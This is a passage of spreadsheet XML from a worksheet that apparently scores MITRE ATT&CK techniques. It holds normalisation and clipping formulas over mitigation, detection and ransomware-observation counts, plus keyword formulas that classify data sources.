        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ477" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>63.1</v>
      </c>
      <c r="AR477" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS477" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT477" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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78" spans="1:47" ht="68">
      <c r="A478" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B478" s="37">
        <f t="shared" si="7"/>
        <v>578.132972</v>
      </c>
      <c r="C478" s="37" t="s">
        <v>1672</v>
      </c>
      <c r="D478" s="50" t="s">
        <v>1673</v>
      </c>
      <c r="E478" s="37"/>
      <c r="F478" s="37">
        <v>1</v>
      </c>
      <c r="G478" s="37">
        <v>1</v>
      </c>
      <c r="H478" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I478" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J478" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K478" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L478" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M478" s="37">
        <v>0</v>
      </c>
      <c r="N478" s="56">
        <v>0</v>
      </c>
      <c r="O478" s="56">
        <v>3</v>
      </c>
      <c r="P478" s="56">
        <v>0</v>
      </c>
      <c r="Q478" s="56">
        <v>0</v>
      </c>
      <c r="R478" s="57" t="s">
        <v>1674</v>
      </c>
      <c r="S478" s="57">
        <v>3</v>
      </c>
      <c r="T478" s="57" t="s">
        <v>1675</v>
      </c>
      <c r="U478" s="57">
        <v>17</v>
      </c>
      <c r="V478" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.2047617142857143</v>
      </c>
      <c r="W478" s="37">
        <v>20</v>
      </c>
      <c r="X478" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Y478" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Z478" s="37">
        <v>3</v>
      </c>
      <c r="AA478" s="37">
        <v>0.03</v>
      </c>
      <c r="AB478" s="37">
        <v>0.03</v>
      </c>
      <c r="AC478" s="37"/>
      <c r="AD478" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE478" s="37" t="str" cm="1">
        <f t="array" ref="AE478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD478)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF478" s="37">
        <v>474</v>
      </c>
      <c r="AG478" s="37" t="str" cm="1">
        <f t="array" ref="AG478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD478)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH478" s="37">
        <v>474</v>
      </c>
      <c r="AI478" s="37" t="str" cm="1">
        <f t="array" ref="AI478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD478)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ478" s="37">
        <v>474</v>
      </c>
      <c r="AK478" s="37" t="str" cm="1">
        <f t="array" ref="AK478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD478)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL478" s="37">
        <v>474</v>
      </c>
      <c r="AM478" s="37" t="str" cm="1">
        <f t="array" ref="AM478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD478)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN478" s="37">
        <v>0</v>
      </c>
      <c r="AO478" s="37">
        <v>0</v>
      </c>
      <c r="AP478" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ478" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>192.71099066666667</v>
      </c>
      <c r="AR478" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS478" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT478" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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79" spans="1:47" ht="51">
      <c r="A479" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B479" s="37">
        <f t="shared" si="7"/>
        <v>371.14770957142855</v>
      </c>
      <c r="C479" s="37" t="s">
        <v>1676</v>
      </c>
      <c r="D479" s="50" t="s">
        <v>1673</v>
      </c>
      <c r="E479" s="37" t="s">
        <v>1677</v>
      </c>
      <c r="F479" s="37">
        <v>1</v>
      </c>
      <c r="G479" s="37">
        <v>1</v>
      </c>
      <c r="H479" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I479" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J479" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K479" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L479" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M479" s="37">
        <v>0</v>
      </c>
      <c r="N479" s="56">
        <v>0</v>
      </c>
      <c r="O479" s="56">
        <v>7</v>
      </c>
      <c r="P479" s="56">
        <v>0</v>
      </c>
      <c r="Q479" s="56">
        <v>1</v>
      </c>
      <c r="R479" s="57" t="s">
        <v>1674</v>
      </c>
      <c r="S479" s="57">
        <v>3</v>
      </c>
      <c r="T479" s="57" t="s">
        <v>1678</v>
      </c>
      <c r="U479" s="57">
        <v>3</v>
      </c>
      <c r="V479" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238142857142855E-2</v>
      </c>
      <c r="W479" s="37">
        <v>6</v>
      </c>
      <c r="X479" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y479" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z479" s="37">
        <v>8</v>
      </c>
      <c r="AA479" s="37">
        <v>0.08</v>
      </c>
      <c r="AB479" s="37">
        <v>0.08</v>
      </c>
      <c r="AC479" s="37"/>
      <c r="AD479" s="50" t="s">
        <v>1679</v>
      </c>
      <c r="AE479" s="37" t="str" cm="1">
        <f t="array" ref="AE479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD479)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF479" s="37">
        <v>475</v>
      </c>
      <c r="AG479" s="37" t="str" cm="1">
        <f t="array" ref="AG479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD479)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH479" s="37">
        <v>475</v>
      </c>
      <c r="AI479" s="37" t="str" cm="1">
        <f t="array" ref="AI479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD479)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ479" s="37">
        <v>475</v>
      </c>
      <c r="AK479" s="37" t="str" cm="1">
        <f t="array" ref="AK479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD479)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL479" s="37">
        <v>475</v>
      </c>
      <c r="AM479" s="37" t="str" cm="1">
        <f t="array" ref="AM479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD479)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN479" s="37">
        <v>0</v>
      </c>
      <c r="AO479" s="37">
        <v>0</v>
      </c>
      <c r="AP479" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ479" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>123.71590319047618</v>
      </c>
      <c r="AR479" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS479" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT479" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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80" spans="1:47" ht="68">
      <c r="A480" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B480" s="37">
        <f t="shared" si="7"/>
        <v>335.64294785714287</v>
      </c>
      <c r="C480" s="37" t="s">
        <v>1680</v>
      </c>
      <c r="D480" s="50" t="s">
        <v>1673</v>
      </c>
      <c r="E480" s="37" t="s">
        <v>1681</v>
      </c>
      <c r="F480" s="37">
        <v>1</v>
      </c>
      <c r="G480" s="37">
        <v>1</v>
      </c>
      <c r="H480" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I480" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J480" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K480" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L480" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M480" s="37">
        <v>0</v>
      </c>
      <c r="N480" s="56">
        <v>0</v>
      </c>
      <c r="O480" s="56">
        <v>1</v>
      </c>
      <c r="P480" s="56">
        <v>3</v>
      </c>
      <c r="Q480" s="56">
        <v>0</v>
      </c>
      <c r="R480" s="57" t="s">
        <v>1674</v>
      </c>
      <c r="S480" s="57">
        <v>3</v>
      </c>
      <c r="T480" s="57" t="s">
        <v>1678</v>
      </c>
      <c r="U480" s="57">
        <v>3</v>
      </c>
      <c r="V480" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190523809523805E-2</v>
      </c>
      <c r="W480" s="37">
        <v>6</v>
      </c>
      <c r="X480" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y480" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z480" s="37">
        <v>4</v>
      </c>
      <c r="AA480" s="37">
        <v>0.04</v>
      </c>
      <c r="AB480" s="37">
        <v>0.04</v>
      </c>
      <c r="AC480" s="37"/>
      <c r="AD480" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE480" s="37" t="str" cm="1">
        <f t="array" ref="AE480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD480)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF480" s="37">
        <v>476</v>
      </c>
      <c r="AG480" s="37" t="str" cm="1">
        <f t="array" ref="AG480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD480)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH480" s="37">
        <v>476</v>
      </c>
      <c r="AI480" s="37" t="str" cm="1">
        <f t="array" ref="AI480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD480)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ480" s="37">
        <v>476</v>
      </c>
      <c r="AK480" s="37" t="str" cm="1">
        <f t="array" ref="AK480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD480)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL480" s="37">
        <v>476</v>
      </c>
      <c r="AM480" s="37" t="str" cm="1">
        <f t="array" ref="AM480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD480)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN480" s="37">
        <v>0</v>
      </c>
      <c r="AO480" s="37">
        <v>2</v>
      </c>
      <c r="AP480" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ480" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>111.88098261904763</v>
      </c>
      <c r="AR480" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS480" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT480" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU48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5.3752848866213148</v>
      </c>
    </row>
    <row r="481" spans="1:47" ht="34">
      <c r="A481" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B481" s="37">
        <f t="shared" si="7"/>
        <v>190.9</v>
      </c>
      <c r="C481" s="37" t="s">
        <v>3811</v>
      </c>
      <c r="D481" s="50" t="s">
        <v>1673</v>
      </c>
      <c r="E481" s="37" t="s">
        <v>3812</v>
      </c>
      <c r="F481" s="37">
        <v>1</v>
      </c>
      <c r="G481" s="37">
        <v>1</v>
      </c>
      <c r="H481" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I481" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J481" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K481" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L481" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M481" s="37">
        <v>0</v>
      </c>
      <c r="N481" s="56">
        <v>0</v>
      </c>
      <c r="O481" s="56">
        <v>0</v>
      </c>
      <c r="P481" s="56">
        <v>0</v>
      </c>
      <c r="Q481" s="56">
        <v>0</v>
      </c>
      <c r="R481" s="57"/>
      <c r="S481" s="57"/>
      <c r="T481" s="57"/>
      <c r="U481" s="57"/>
      <c r="V481" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W481" s="37"/>
      <c r="X481" s="37"/>
      <c r="Y481" s="37"/>
      <c r="Z481" s="37"/>
      <c r="AA481" s="37"/>
      <c r="AB481" s="37"/>
      <c r="AC481" s="37"/>
      <c r="AD481" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE481" s="37" t="str" cm="1">
        <f t="array" ref="AE481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF481" s="37">
        <v>477</v>
      </c>
      <c r="AG481" s="37" t="str" cm="1">
        <f t="array" ref="AG481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD481)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH481" s="37">
        <v>477</v>
      </c>
      <c r="AI481" s="37" t="str" cm="1">
        <f t="array" ref="AI481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ481" s="37">
        <v>477</v>
      </c>
      <c r="AK481" s="37" t="str" cm="1">
        <f t="array" ref="AK481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL481" s="37">
        <v>477</v>
      </c>
      <c r="AM481" s="37" t="str" cm="1">
        <f t="array" ref="AM481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN481" s="37"/>
      <c r="AO481" s="37"/>
      <c r="AP481" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ481" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>63.633333333333333</v>
      </c>
      <c r="AR481" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS481" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT481" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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82" spans="1:47" ht="68">
      <c r="A482" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B482" s="37">
        <f t="shared" si="7"/>
        <v>191.3</v>
      </c>
      <c r="C482" s="37" t="s">
        <v>3813</v>
      </c>
      <c r="D482" s="50" t="s">
        <v>1673</v>
      </c>
      <c r="E482" s="37" t="s">
        <v>3814</v>
      </c>
      <c r="F482" s="37">
        <v>1</v>
      </c>
      <c r="G482" s="37">
        <v>1</v>
      </c>
      <c r="H482" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I482" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J482" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K482" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L482" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M482" s="37">
        <v>0</v>
      </c>
      <c r="N482" s="56">
        <v>0</v>
      </c>
      <c r="O482" s="56">
        <v>0</v>
      </c>
      <c r="P482" s="56">
        <v>0</v>
      </c>
      <c r="Q482" s="56">
        <v>0</v>
      </c>
      <c r="R482" s="57"/>
      <c r="S482" s="57"/>
      <c r="T482" s="57"/>
      <c r="U482" s="57"/>
      <c r="V482" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W482" s="37"/>
      <c r="X482" s="37"/>
      <c r="Y482" s="37"/>
      <c r="Z482" s="37"/>
      <c r="AA482" s="37"/>
      <c r="AB482" s="37"/>
      <c r="AC482" s="37"/>
      <c r="AD482" s="50" t="s">
        <v>3815</v>
      </c>
      <c r="AE482" s="37" t="str" cm="1">
        <f t="array" ref="AE482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD482)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF482" s="37">
        <v>478</v>
      </c>
      <c r="AG482" s="37" t="str" cm="1">
        <f t="array" ref="AG482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD482)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH482" s="37">
        <v>478</v>
      </c>
      <c r="AI482" s="37" t="str" cm="1">
        <f t="array" ref="AI482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD482)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ482" s="37">
        <v>478</v>
      </c>
      <c r="AK482" s="37" t="str" cm="1">
        <f t="array" ref="AK482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD482)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL482" s="37">
        <v>478</v>
      </c>
      <c r="AM482" s="37" t="str" cm="1">
        <f t="array" ref="AM482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD482)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN482" s="37"/>
      <c r="AO482" s="37"/>
      <c r="AP482" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ482" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>63.766666666666673</v>
      </c>
      <c r="AR482" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS482" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT482" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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83" spans="1:47" ht="51">
      <c r="A483" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B483" s="37">
        <f t="shared" si="7"/>
        <v>488.37857142857149</v>
      </c>
      <c r="C483" s="37" t="s">
        <v>1682</v>
      </c>
      <c r="D483" s="50" t="s">
        <v>1683</v>
      </c>
      <c r="E483" s="37"/>
      <c r="F483" s="37">
        <v>1</v>
      </c>
      <c r="G483" s="37">
        <v>2</v>
      </c>
      <c r="H483" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
